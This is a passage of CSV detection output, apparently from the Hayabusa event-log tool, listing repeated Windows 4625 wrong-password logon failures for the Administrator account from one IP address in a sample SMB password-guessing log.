NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOYMVAnCWB2RFYAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1S45GBtQ8Uoyilw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60oeDAnU41sz1wYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enjlrrdf6lrm7Bao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58WzO6wxh7QshZgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eZKzHgu5ADLYsWU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uOSK3xC1E5PpBVNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vFXasYWGCHbQOWWI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XlYJ3oHYKYhg0KC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LxOKwi8Q4y2mHBDu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwFKFySH4w2yWtPX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlwGTGadOEMfUFiM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hZ9WuMoOtxGdwOQn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cCLK0gWvRoz0Ceao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDrcOxtm2fHXK5pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm2tPGetcAJkSuvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FBskiUSfF2ghuDcF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZJal2nq3JAk6I2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9ek0Sl1ikhIfIb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eHrn5Tp9JtnAgCbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7tR8gp2piqqixqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SqSBRMoiFeWe4FAt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nu4m1xKDU0OUkoR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gui98cdQHPgyNOZI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bm4U7TAfsPTEiygC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fDOoaVWVFAMLiA71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qiJeLgInEkHffefo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWyguWQP2iYUArhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vDa3GqsTMMXguFhi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lr0lkAcdnji1zjW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4WfNFd5MkQxaxHGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8hdPhtxP4Ds65yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2BBoWoXWXuRysTx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6GEhZ2BduHwjJj9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GbwEHQCAUJd64LlA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wGfoObbN8ioefyce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iLHhCgHvmOzoLLqG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9KL69y47DMyFOWT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ECuVYiqdMw2dMjT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YJCYumRekD7AREYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0H4OxKzoemZrsosT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSHnvxa0khWdWBVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bJkPp0bghDCPYz52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfHRWGXjCej9HSPb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X42H7EvrvzsRqXWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moo42NdOq30Gnz3T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4NHVYxxDkCOsQw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iPUiW0vFQB405kwS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OtcZ4ymkeLHeU7YJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxZCDKWtqkGJ0dnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f4GGnhttZgmRPRJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gI0j9w45eXEFeex3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BVZ2YRDUAOsNgKxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJfIpxlcwVf7pWga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Oerixd9ODF6fslsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJC5yvrIymYgaHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4schZcUP8Im8Ee1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WotargyGlEq9PBch | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2JSMrPoucOR0nzlD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jr4w4uoF2DVZ5n9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v319oZIaOBpuf542 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GNRTL9BLlGWMx6dA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHlDIOZ9B5uY8Rzz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dr2bvAue8mr5kagX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXBds9GoXr6IZUfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLYuegjXO18lo342 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: To3MMEEvNXKNjKHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N0HCToTmh3ESGBYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nNvBueVo3ANNmSSN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVWOoAG5ermGL2Gl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W7QYJUNPm5b4jprh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PHllwNJvpH3P97cp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tfT8GtafHGYMlkMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nab7wtZfBVkcynsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHiijj7sT9nyqxii | IP Addr: 192.168.198.149 | AuthPackage: 